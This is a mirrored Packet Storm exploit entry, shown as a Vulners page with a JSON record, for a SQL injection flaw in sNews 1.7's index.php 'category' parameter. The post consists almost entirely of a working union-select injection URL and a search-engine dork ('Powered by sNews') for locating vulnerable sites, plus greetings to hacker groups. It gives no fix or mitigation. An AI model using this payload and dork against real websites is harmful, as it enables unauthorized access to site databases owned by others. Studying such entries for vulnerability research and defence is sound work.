Search...

sNews 1.7 SQL Injection

2010-07-26T00:00:00

ID PACKETSTORM:92147
Type packetstorm
Reporter CoBRa_21
Modified 2010-07-26T00:00:00

Description

                                        
                                            `########################################################################################  
  
sNews v1.7 (index.php?category) SQL Injection Vulnerability  
  
########################################################################################  
  
Author : CoBRa_21  
  
Author Web Page : http://www.ipbul.org  
  
Dork: "Powered by sNews"  
  
########################################################################################  
  
Sql Injection:  
  
http://localhost/[path]/index.php?category=-3 union select 0,version(),2,3,4,5,6,7,8  
  
########################################################################################  
Thanks http://e-banka.org & http://www.cyber-warrior.org  
########################################################################################  
  
`

JSON Vulners Source

Initial Source

{"type": "packetstorm", "published": "2010-07-26T00:00:00", "reporter": "CoBRa_21", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "d6faee1d024db78cb2158dcf7712874d"}, {"key": "modified", "hash": "1ab7766b7f7d96021653deb2eda0d0ba"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "1ab7766b7f7d96021653deb2eda0d0ba"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "5ab8b13712ef31091f0d3ca4433e2e0b"}, {"key": "sourceData", "hash": "183b5434f3729744a2fcb0e1ff2613be"}, {"key": "sourceHref", "hash": "24f26c1b6dd892933625b1be90106476"}, {"key": "title", "hash": "cd7dd43e0d85c17e3cb72c369b8f1bea"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`######################################################################################## \n \nsNews v1.7 (index.php?category) SQL Injection Vulnerability \n \n######################################################################################## \n \nAuthor : CoBRa_21 \n \nAuthor Web Page : http://www.ipbul.org \n \nDork: \"Powered by sNews\" \n \n######################################################################################## \n \nSql Injection: \n \nhttp://localhost/[path]/index.php?category=-3 union select 0,version(),2,3,4,5,6,7,8 \n \n######################################################################################## \nThanks http://e-banka.org & http://www.cyber-warrior.org \n######################################################################################## \n \n`\n", "viewCount": 0, "history": [], "lastseen": "2016-11-03T10:21:05", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/92147/sNews-1.7-SQL-Injection.html", "sourceHref": "https://packetstormsecurity.com/files/download/92147/snews17cat-sql.txt", "title": "sNews 1.7 SQL Injection", "enchantments": {"score": {"vector": "NONE", "value": 6.8}, "dependencies": {"references": [], "modified": "2016-11-03T10:21:05"}, "vulnersScore": 6.8}, "references": [], "id": "PACKETSTORM:92147", "hash": "8d5554a96a3f1885136f307bdb0506f3683dc021c36467fa244b0335a92bd32d", "edition": 1, "cvelist": [], "modified": "2010-07-26T00:00:00", "description": ""}